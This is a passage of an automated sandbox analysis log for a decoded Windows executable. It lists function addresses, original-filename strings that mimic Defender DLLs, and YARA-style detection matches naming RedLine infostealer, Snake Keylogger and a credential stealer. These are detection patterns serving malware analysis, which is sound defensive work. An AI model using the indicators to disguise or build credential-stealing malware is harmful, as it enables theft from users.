                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064164400_2_06416440
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06411C600_2_06411C60
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06414E600_2_06414E60
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06412C000_2_06412C00
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06415E000_2_06415E00
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064116200_2_06411620
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064148200_2_06414820
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064132300_2_06413230
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06410CC00_2_06410CC0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06413EC00_2_06413EC0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064170C80_2_064170C8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064128E00_2_064128E0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06415AE00_2_06415AE0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064144F00_2_064144F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064106800_2_06410680
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064138800_2_06413880
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06416A880_2_06416A88
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064122A00_2_064122A0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064154A00_2_064154A0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064119400_2_06411940
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06414B400_2_06414B40
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064103600_2_06410360
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064135600_2_06413560
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064167600_2_06416760
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064113000_2_06411300
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064145000_2_06414500
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06412F100_2_06412F10
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06412F200_2_06412F20
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064161200_2_06416120
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064125C00_2_064125C0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064157C00_2_064157C0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06410FE00_2_06410FE0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064141E00_2_064141E0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064173E80_2_064173E8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064195F00_2_064195F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06411F800_2_06411F80
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064151800_2_06415180
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064109A00_2_064109A0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06413BA00_2_06413BA0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06416DA80_2_06416DA8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064265100_2_06426510
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642FB280_2_0642FB28
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06426BB80_2_06426BB8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064240420_2_06424042
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642A0420_2_0642A042
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064200400_2_06420040
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642E3400_2_0642E340
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064257410_2_06425741
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642294A0_2_0642294A
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064257480_2_06425748
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064275480_2_06427548
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642CB480_2_0642CB48
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064240500_2_06424050
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642A0500_2_0642A050
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642F6510_2_0642F651
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642CB580_2_0642CB58
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064229580_2_06422958
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064288580_2_06428858
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064209600_2_06420960
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642F6600_2_0642F660
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642B3600_2_0642B360
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064220670_2_06422067
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064220680_2_06422068
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064288680_2_06428868
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064260690_2_06426069
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064209700_2_06420970
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642B3700_2_0642B370
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064249700_2_06424970
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064270700_2_06427070
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642DE750_2_0642DE75
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642327A0_2_0642327A
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642DE780_2_0642DE78
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064260780_2_06426078
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06429B780_2_06429B78
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06427A020_2_06427A02
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642BD000_2_0642BD00
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064265000_2_06426500
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064200060_2_06420006
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06420E080_2_06420E08
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642E8080_2_0642E808
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06424E080_2_06424E08
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642A5080_2_0642A508
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06427A100_2_06427A10
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064237100_2_06423710
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642D0160_2_0642D016
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06424E180_2_06424E18
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642A5180_2_0642A518
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064237200_2_06423720
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0642D0200_2_0642D020
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06428D210_2_06428D21
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064217280_2_06421728
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, Code function: String function: 0040E1D8 appears 44 times
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234424634.000000000060E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMsMpLics.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234424634.000000000060E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamempclient.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilename_.dll4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilename_.dll4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilename_.dll4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3678137911.0000000000197000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234475804.000000000061D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMsMpLics.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234475804.000000000061D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamempclient.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234391315.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMsMpLics.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234391315.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamempclient.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, Binary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, type: SAMPLE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.0.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
